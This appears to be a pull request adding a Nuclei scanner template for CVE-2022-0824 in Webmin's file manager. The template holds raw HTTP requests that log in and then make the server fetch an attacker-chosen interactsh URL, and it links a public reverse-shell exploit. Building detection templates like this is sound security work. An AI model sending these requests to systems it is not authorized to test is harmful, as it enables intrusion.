### PR TITLE
add CVE-2022-0824

### DIFF
--- a/cves/2022/CVE-2022-0824.yaml
+++ b/cves/2022/CVE-2022-0824.yaml
@@ -1,14 +1,14 @@
 id: CVE-2022-0824
 
 info:
-  name: Webmin below 1.990 - File Manager privilege exploit
+  name: Webmin prior to 1.990 - Improper Access Control to Remote Code Execution
   author: cckuailong
   severity: high
   description: Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.
   reference:
     - https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell/blob/main/Webmin-revshell.py
     - https://nvd.nist.gov/vuln/detail/CVE-2022-0824
-  tags: cve,cve2022,webmin,authenticated
+  tags: cve,cve2022,webmin,authenticated,rce,oss
 
 requests:
   - raw:
@@ -29,11 +29,17 @@ requests:
         X-Requested-With: XMLHttpRequest
         Referer: {{RootURL}}/filemin/?xnavigation=1
 
-        link=http://{{interactsh-url}}&username=&password=&path=/xxx
+        link=http://{{interactsh-url}}&username=&password=&path=/{{ranstr}}
 
     cookie-reuse: true
+    matchers-condition: and
     matchers:
       - type: word
         part: interactsh_protocol
         words:
           - "dns"
+
+      - type: word
+        part: body
+        words:
+          - "Failed to write to /{{ranstr}}/index.html"

--- a/cves/2022/CVE-2022-0824.yaml
+++ b/cves/2022/CVE-2022-0824.yaml
@@ -1,0 +1,40 @@
+id: CVE-2022-0824
+
+info:
+  name: Webmin below 1.990 - File Manager privilege exploit
+  author: cckuailong
+  severity: high
+  description: Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.
+  reference:
+    - https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell/blob/main/Webmin-revshell.py
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0824
+  tags: cve,cve2022,webmin,privilege,auth
+
+requests:
+  - raw:
+      - |
+        POST /session_login.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: redirect=1;testing=1;PHPSESSID=;
+
+        user={{username}}&pass={{password}}
+
+      - |
+        POST /extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json, text/javascript, */*; q=0.01
+        Accept-Encoding: gzip, deflate
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+        Referer: {{RootURL}}/filemin/?xnavigation=1
+
+        link=http://{{interactsh-url}}&username=&password=&path=/xxx
+
+    cookie-reuse: true
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"

--- a/cves/2022/CVE-2022-0824.yaml
+++ b/cves/2022/CVE-2022-0824.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell/blob/main/Webmin-revshell.py
     - https://nvd.nist.gov/vuln/detail/CVE-2022-0824
-  tags: cve,cve2022,webmin,privilege,auth
+  tags: cve,cve2022,webmin,authenticated
 
 requests:
   - raw:
@@ -32,7 +32,6 @@ requests:
         link=http://{{interactsh-url}}&username=&password=&path=/xxx
 
     cookie-reuse: true
-
     matchers:
       - type: word
         part: interactsh_protocol


### PR DESCRIPTION
### Template / PR Information

Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.

- References:
 https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell/blob/main/Webmin-revshell.py
 https://nvd.nist.gov/vuln/detail/CVE-2022-0824

### Template Validation

I've validated this template locally?
- YES

Vultarget: 
https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-0824/vultarget
<img width="567" alt="1" src="https://user-images.githubusercontent.com/10824150/156991141-8d295cbd-05e1-418b-af3a-67cca2df8f51.png">

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)